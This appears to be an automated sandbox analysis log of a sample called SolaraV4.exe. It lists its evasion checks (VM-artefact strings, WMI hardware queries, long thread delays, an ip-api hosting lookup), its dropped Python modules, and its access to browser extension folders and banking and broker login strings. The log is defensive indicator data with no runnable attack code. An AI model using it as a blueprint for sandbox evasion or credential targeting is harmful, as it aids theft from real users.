Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Accept-Encoding: identity | User-Agent: python-urllib3/2.2.3
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6843
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 603
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4945
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 390
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3823
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 746
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2751
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4510
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4436
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2510
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1759
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_sqlite3.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\python310.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_queue.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_socket.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_lzma.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_decimal.pyd
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.dll
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_ctypes.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\select.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_ssl.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\unicodedata.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_bz2.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI71122\_hashlib.pyd
Source: C:\Users\user\Desktop\SolaraV4.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\SolaraV4.exe API coverage: 4.9 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980 Thread sleep count: 6843 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980 Thread sleep count: 603 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6356 Thread sleep count: 43 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772 Thread sleep count: 4945 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060 Thread sleep count: 390 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6260 Thread sleep count: 43 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5852 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964 Thread sleep count: 746 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\SIHClient.exe TID: 6520 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476 Thread sleep count: 4510 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476 Thread sleep count: 158 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep count: 4436 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4492 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep count: 233 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 Thread sleep count: 3447 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5688 Thread sleep count: 459 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 Thread sleep count: 2510 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 Thread sleep count: 1759 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 1_2_00007FF6FFC583C0
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC59280 FindFirstFileExW,FindClose, 1_2_00007FF6FFC59280
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC71874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC59280 FindFirstFileExW,FindClose, 3_2_00007FF6FFC59280
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC71874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 3_2_00007FF6FFC71874
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 3_2_00007FF6FFC583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 3_2_00007FF6FFC583C0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72046EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 108_2_00007FF7C72046EC
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72488E0 FindFirstFileExA, 108_2_00007FF7C72488E0
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C71FE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 108_2_00007FF7C71FE21C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxtrayZ
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: getmac.exe, 00000050.00000002.2658681737.000001E2C98B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696508427s
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696508427f
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: SIHClient.exe, 00000045.00000003.3048680197.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3048283576.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2668582901.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000002.3052583503.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3050867328.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2672453963.00000270AE649000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWF6cC
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: getmac.exe, 00000050.00000002.2658681737.000001E2C98B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: svchost.exe, 0000001C.00000002.3722373698.000001984C82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3724833683.0000019852054000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3048680197.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3048283576.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2668582901.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000002.3052583503.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3050867328.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2672453963.00000270AE649000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000002.2658681737.000001E2C98B3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657356233.000001E2C989E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.2657016864.000001E2C988A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: SIHClient.exe, 00000045.00000002.3052583503.00000270AE5F6000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.3050867328.00000270AE5F6000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000045.00000003.2669455077.00000270AE5F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@:e
Source: SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmsrvcZ
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696508427j
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, SolaraV4.exe, 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmusrvcZ
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: SolaraV4.exe, 00000003.00000003.2819493322.0000024133FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
